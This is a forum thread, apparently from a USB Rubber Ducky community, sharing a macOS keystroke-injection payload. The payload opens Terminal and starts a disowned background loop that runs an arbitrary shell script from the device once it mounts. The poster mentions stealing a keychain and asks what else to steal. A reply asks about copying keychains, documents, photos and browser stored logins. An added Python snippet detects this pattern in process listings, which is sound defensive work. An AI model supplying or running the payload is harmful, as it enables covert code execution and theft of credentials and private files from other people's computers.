[Payload] OSX Run duckslurp shell in the background ASAP


Toreddo

I created a pretty simple payload for Mac OSX; this is the fastest I could get it. You might want to play with some delays, but my decent mac is running this just fine. It basically types a while loop into the terminal that waits for a volume named DUCKY to mount by looking for the file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible.

DELAY 3000
COMMAND SPACE
DELAY 200
STRING terminal
ENTER
DELAY 200
STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &
ENTER
STRING disown
ENTER
STRING exit
ENTER
COMMAND Q

So in your 'a' file you can write a shell script of any length you want; it will all execute in the background.

P.s. I just stole my own keychain, are there any more interesting things I could try to steal?

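From the defender's side, what this payload leaves on the host is distinctive: a shell that polls a /Volumes path until the file exists, then hands that same file to an interpreter in the background. As an added example (not part of the original thread), this Python scans a process listing for both halves of that pattern; the sample lines, pattern names and the Finding type are constructed here and are not from the post.

```python
import re
from dataclasses import dataclass, field

# Constructed sample, shaped like `ps -eo pid,command` output (not a real capture).
SAMPLE_PS = """\
  412 /usr/libexec/trustd
  933 /bin/sh -c while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a &
  934 /bin/bash -c while true; do sleep 60; done
  988 /bin/sh /Volumes/DUCKY/a
 1001 /bin/sh /Users/alice/build.sh
"""

VOLUME_PATH = r"/Volumes/[^\s;&|]+"
# Half 1: a loop that keeps testing whether a file under /Volumes exists yet.
POLL_LOOP = re.compile(r"while\s+\[\s*!\s*-[fe]\s+(" + VOLUME_PATH + r")\s*\]")
# Half 2: an interpreter launched directly on a file under /Volumes.
EXEC_FROM_VOLUME = re.compile(
    r"\b(?:sh|bash|zsh|python3?|osascript)\s+(" + VOLUME_PATH + r")"
)


@dataclass
class Finding:
    pid: int
    reasons: list = field(default_factory=list)


def scan_ps_output(text):
    """Return one Finding per process whose command line polls for, or
    executes from, a path under /Volumes. Benign loops and scripts run
    from the user's home directory produce no finding."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        pid_str, _, cmd = line.partition(" ")
        reasons = []
        if (m := POLL_LOOP.search(cmd)):
            reasons.append(f"polls until {m.group(1)} exists")
        if (m := EXEC_FROM_VOLUME.search(cmd)):
            reasons.append(f"runs an interpreter on {m.group(1)}")
        if reasons:
            findings.append(Finding(int(pid_str), reasons))
    return findings


if __name__ == "__main__":
    for f in scan_ps_output(SAMPLE_PS):
        print(f.pid, "; ".join(f.reasons))
```

On a live machine, feed the function the output of `ps -eo pid,command`; a hit on the poll loop alone is the window before the volume mounts, which is where unplugging the device still prevents the script from running.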

  • 7 months later...

This looks interesting, do you think it's the best approach? Have you figured out more since? I'm definitely going to test this out and see how it works. Thanks for sharing!

How would you go about the keychain copying?

I'd like to attempt the same, and maybe also experiment with grabbing the active User / Documents / Photo Library / Movies directories and copying them to the Ducky USB mounted section, maybe even the Chrome and Firefox favorites, stored logins, etc. Basically like a super-backup saving feature for dire situations.
